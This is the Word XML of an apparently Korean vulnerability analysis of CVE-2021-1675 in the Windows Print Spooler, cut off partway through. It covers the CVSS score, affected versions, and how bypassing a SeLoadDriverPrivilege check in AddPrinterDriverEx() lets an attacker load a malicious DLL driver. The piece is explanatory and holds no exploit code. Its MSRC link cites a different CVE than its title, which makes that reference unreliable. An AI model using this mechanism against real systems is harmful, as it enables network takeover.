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1913" w14:textId="228AE366" w:rsidR="002F0421" w:rsidRPr="002F0421" w:rsidRDefault="00E050FD" w:rsidP="002F042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1"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="굴림"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0421">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="굴림"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:t>CVE-2021-</w:t>
      </w:r>
      <w:r w:rsidR="002F0421">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="굴림"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="50"/>
          <w:szCs w:val="50"/>
        </w:rPr>
        <w:t>1675</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ACA72B" w14:textId="1A95DF16" w:rsidR="002F0421" w:rsidRPr="002F0421" w:rsidRDefault="002F0421">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="029C06E5" w14:textId="6EDAF81A" w:rsidR="002F0421" w:rsidRPr="00A22F81" w:rsidRDefault="002F0421">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A22F81">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[취약점 평가 내역</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22F81">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5B0ED1" w14:textId="51674E50" w:rsidR="00353472" w:rsidRPr="002F0421" w:rsidRDefault="00367702" w:rsidP="001A4CDA">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0421">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CVSS </w:t>
      </w:r>
      <w:r w:rsidR="002F0421" w:rsidRPr="002F0421">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>v3.</w:t>
      </w:r>
      <w:r w:rsidR="00C31E8B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="002F0421" w:rsidRPr="002F0421">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0421">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A4CDA">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0421">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA1F89E" w14:textId="78280A8E" w:rsidR="002F0421" w:rsidRPr="002F0421" w:rsidRDefault="00367702" w:rsidP="001A4CDA">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0421">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0421">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WE-</w:t>
      </w:r>
      <w:r w:rsidR="002F0421" w:rsidRPr="002F0421">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ID:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0421">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CWE-269 (Improper Privilege Management)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41829C" w14:textId="2F0B7157" w:rsidR="002F0421" w:rsidRPr="002F0421" w:rsidRDefault="002F0421" w:rsidP="001A4CDA">
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0421">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MSRC: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="002F0421">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44DE761F" w14:textId="1A25D4C3" w:rsidR="002F0421" w:rsidRDefault="00C31E8B" w:rsidP="00C31E8B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1240"/>
        </w:tabs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V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ector: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C31E8B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385FEE98" w14:textId="77777777" w:rsidR="00A22F81" w:rsidRPr="002F0421" w:rsidRDefault="00A22F81" w:rsidP="00C31E8B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1240"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673473F6" w14:textId="6192C13C" w:rsidR="002F0421" w:rsidRPr="00A22F81" w:rsidRDefault="002F0421">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A22F81">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[영향을 받는 버전]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB36D6B" w14:textId="2B435321" w:rsidR="002F0421" w:rsidRPr="00A22F81" w:rsidRDefault="001A4CDA" w:rsidP="00A22F81">
      <w:pPr>
        <w:spacing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Windows Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E06DA6C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9 (Server Core installation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F665EE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9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B14FAC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6 (Server Core installation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174A6F20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6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D95D8FF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2 R2 (Server Core installation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B27539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2 R2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1147C33B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2 (Server Core installation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091978C4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12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313AB1E0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R2 for x64-based Systems Service Pack 1 (Server Core installation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C69A78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R2 for x64-based Systems Service Pack 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6520BAFE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for x64-based Systems Service Pack 2 (Server Core installation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B29477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for x64-based Systems Service Pack 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F66C2D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for 32-bit Systems Service Pack 2 (Server Core installation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA0D71C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 2008 for 32-bit Systems Service Pack 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21692211" w14:textId="77777777" w:rsidR="003F5D47" w:rsidRPr="003F5D47" w:rsidRDefault="003F5D47" w:rsidP="00A22F81">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:leftChars="0" w:left="806" w:hanging="403"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F5D47">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Windows Server, version 2004 (Server Core installation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3F5F1A" w14:textId="50D8D408" w:rsidR="0008410B" w:rsidRDefault="001A4CDA" w:rsidP="00A22F81">
      <w:pPr>
        <w:spacing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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0DD836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RT 8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C8AE1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8.1 for x64-based systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D88593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8.1 for 32-bit systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8915D9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7 for x64-based Systems Service Pack 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F17D736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7 for 32-bit Systems Service Pack 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A80C7F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607 for x64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F42613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607 for 32-bit Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66657ABF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lastRenderedPageBreak/>
        <w:t>Windows 10 for x64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E22D50A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for 32-bit Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7953D0CC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Server, version 20H2 (Server Core Installation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7E1F18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H2 for ARM64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447B8E4C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H2 for 32-bit Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530EC463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H2 for x64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7890EE71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04 for x64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B185524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04 for ARM64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F873C18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004 for 32-bit Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22191B7E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1H1 for 32-bit Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38408225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1H1 for ARM64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCDA953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21H1 for x64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E58D7F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909 for ARM64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027231C2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909 for x64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EB9340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909 for 32-bit Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757CEBCB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809 for ARM64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546ED117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809 for x64-based Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A58536C" w14:textId="77777777" w:rsidR="00A22F81" w:rsidRPr="00A22F81" w:rsidRDefault="00A22F81" w:rsidP="00A22F81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eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A22F81">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Windows 10 Version 1809 for 32-bit Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294B15D8" w14:textId="76B40084" w:rsidR="00A22F81" w:rsidRDefault="00A22F81" w:rsidP="00A22F81">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6986E924" w14:textId="7671024D" w:rsidR="00A22F81" w:rsidRPr="00A22F81" w:rsidRDefault="00A22F81" w:rsidP="00A22F81">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A22F81">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>취약점 소개</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22F81">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7284BE56" w14:textId="126C7920" w:rsidR="00A22F81" w:rsidRDefault="006F2068" w:rsidP="00A22F81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VE-2021-1675</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Hlk78210102"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Windows Print Spoole</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>라는 윈도우의 프린터 작업을 관리해주는 프로세스에서 사용되는 A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ddPrinterDriverEx()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 함수에서 발견된 인증 우회 취약점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자는 해당 취약점으로 타겟 서버에 악성 드라이버(D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>LL)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 설치하여 내부망을 장악할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E22997" w14:textId="24F1B16D" w:rsidR="00993AE6" w:rsidRDefault="000A61BA" w:rsidP="00A22F81">
      <w:pPr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 취약점은 최근 이슈가 되고 있는 프린트 나이트메어 취약점(C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>VE-2021-34527)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>과 동일하지 않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VE-2021-34481</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>과도 동일하지 않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 C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>VE-2021-1675</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>만을 다루는 이유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 취약점의 제보자가 비교적 최근 제보를 진행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M</w:t>
      </w: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측에서 보안 패치가 제대로 되지 않은 점과 최초 제보자가 다음 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>DEF CON</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에서 P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>OC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 공개하기로 하였기 때문입니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67306701" w14:textId="77777777" w:rsidR="00E94A55" w:rsidRDefault="00E94A55" w:rsidP="00A22F81">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C47D0AD" w14:textId="52F53B53" w:rsidR="00E94A55" w:rsidRPr="00A22F81" w:rsidRDefault="00E94A55" w:rsidP="00E94A55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A22F81">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows Print Spooler</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22F81">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B302C8" w14:textId="4CBC0ED4" w:rsidR="006F2068" w:rsidRDefault="00E94A55" w:rsidP="00E94A55">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">윈도우가 제공하는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00E94A55">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이</w:t>
      </w:r>
      <w:r w:rsidRPr="00E94A55">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 서비스는 인쇄 작업을 스풀링하고 프린터와의 상호 작용을 처리합니다. 이 서비스를 끄면 인쇄하거나 프린터를 표시할 수 없습니다.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Local System </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자로 로그온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행 파일 경로는 다음과 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE95186" w14:textId="7C114CE4" w:rsidR="00E94A55" w:rsidRDefault="00E94A55" w:rsidP="009E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E94A55">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>C:\WINDOWS\System32\spoolsv.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBFB68C" w14:textId="77777777" w:rsidR="00E94A55" w:rsidRDefault="00E94A5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789C9D8" w14:textId="1F4CBE87" w:rsidR="00E94A55" w:rsidRDefault="00E4591E" w:rsidP="00E94A55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[</w:t>
      </w:r>
      <w:r w:rsidR="00E94A55">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00E94A55">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eLoadDriverPrivilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B2BD7D" w14:textId="5573E833" w:rsidR="00E94A55" w:rsidRDefault="00E94A55" w:rsidP="00E94A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취약점이 우회하는 권한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LoadDriverPrivilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에 대한 검사를 말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관리자 권한은 W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">에서 제공하는 드라이버를 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Load, unload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">하는 권한을 </w:t>
      </w:r>
      <w:r w:rsidR="00F85607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>말합니다.</w:t>
      </w:r>
      <w:r w:rsidR="00F85607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F85607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">이는 관리자 </w:t>
      </w:r>
      <w:r w:rsidR="00F85607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="00F85607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">창에서 </w:t>
      </w:r>
      <w:r w:rsidR="00F85607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:r w:rsidR="00F85607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 통해 현재 프로세스에 대한 어떤 권한(</w:t>
      </w:r>
      <w:r w:rsidR="00F85607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Privilege)</w:t>
      </w:r>
      <w:r w:rsidR="00F85607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를 가지고 있는지 확인</w:t>
      </w:r>
      <w:r w:rsidR="00F85607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>할</w:t>
      </w:r>
      <w:r w:rsidR="00F85607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4932B9B9" w14:textId="77777777" w:rsidR="00F85607" w:rsidRDefault="00F85607" w:rsidP="00F85607">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00F85607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="195703F5" wp14:editId="2FCAA828">
            <wp:extent cx="5731510" cy="4150360"/>
            <wp:effectExtent l="19050" t="19050" r="21590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A40B" w14:textId="3285B328" w:rsidR="00F85607" w:rsidRDefault="00F85607" w:rsidP="00F85607">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">그림 </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ 그림 \* ARABIC ">
        <w:r w:rsidR="00E4591E">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>/ whoami /priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4161151A" w14:textId="4B35B520" w:rsidR="00A53E94" w:rsidRDefault="00A53E94" w:rsidP="00E94A55"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LoadDriverPrivilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
